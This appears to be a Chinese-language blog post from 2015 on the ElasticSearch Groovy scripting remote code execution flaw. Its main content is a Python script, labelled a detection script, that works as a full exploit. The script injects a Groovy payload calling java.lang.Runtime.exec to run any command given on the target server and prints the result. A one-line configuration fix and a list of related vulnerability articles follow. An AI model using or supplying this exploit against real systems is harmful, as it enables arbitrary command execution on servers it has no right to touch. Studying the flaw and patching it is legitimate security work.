ElasticSearch Groovy脚本远程代码执行漏洞检测脚本和修复方案
2015-03-06 00:00
786 查看
摘要: ElasticSearch Groovy脚本远程代码执行漏洞
检测脚本:
修复方案:
在elasticsearch.yml最后一行加上
并重启elasticsearch
检测脚本:
#!/usr/bin/env python import urllib import urllib2 import json import sys def execute(url,command): parameters = {"size":1, "script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"%s\").getInputStream().readLines()" % command,"lang": "groovy"} } } data = json.dumps(parameters) try: request=urllib2.Request(url+"_search?pretty",data) request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36') response=urllib2.urlopen(request) result = json.loads(response.read())["hits"]["hits"][0]["fields"]["iswin"][0] for i in result: print i except Exception, e: print e if __name__ == '__main__': if len(sys.argv) != 3: print "usage %s url command" % sys.argv[0] else: execute(sys.argv[1],sys.argv[2])
修复方案:
在elasticsearch.yml最后一行加上
script.groovy.sandbox.enabled: false
并重启elasticsearch
相关文章推荐
- ElasticSearch Groovy脚本远程代码执行漏洞
- PHP-CGI远程任意代码执行漏洞(CVE-2012-1823)修复方案
- Memcached远程代码执行漏洞预警与检测修复
- Fastjson 爆出远程代码执行高危漏洞,更新版本已修复
- Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本
- Struts S2-016 远程任意命令执行漏洞检测代码
- struts2之高危远程代码执行漏洞,可造成服务器被入侵,下载最新版本进行修复
- 漏洞到来:CVE-2017-8620:Windows Search远程代码执行漏洞
- WordPress wp-includes/functions.php脚本远程任意代码执行漏洞
- 漏洞到来:CVE-2017-8620:Windows Search远程代码执行漏洞
- Fastjson 爆出远程代码执行高危漏洞,更新版本已修复
- struts2之高危远程代码执行漏洞,可造成服务器被入侵,下载最新版本进行修复
- Struts2再爆远程命令执行漏洞!Struts2-048 Poc Shell及防御修复方案抢先看!
- Struts2再爆远程命令执行漏洞![W3bSafe]Struts2-048 Poc Shell及防御修复方案抢先看!
- Struts2远程代码执行漏洞检测的原理和代码级实现
- Android静态安全检测 -> WebView组件远程代码执行漏洞检测
- Git中的远程代码执行漏洞已被修复 多个工具受影响
- 【windows勒索病毒相关-EternalBlue】Windows系统SMB/RDP远程命令执行漏洞修复方案
- Struts2 S2-016,S2-017远程代码执行漏洞解决,修复
- php cgi-wrap远程代码执行漏洞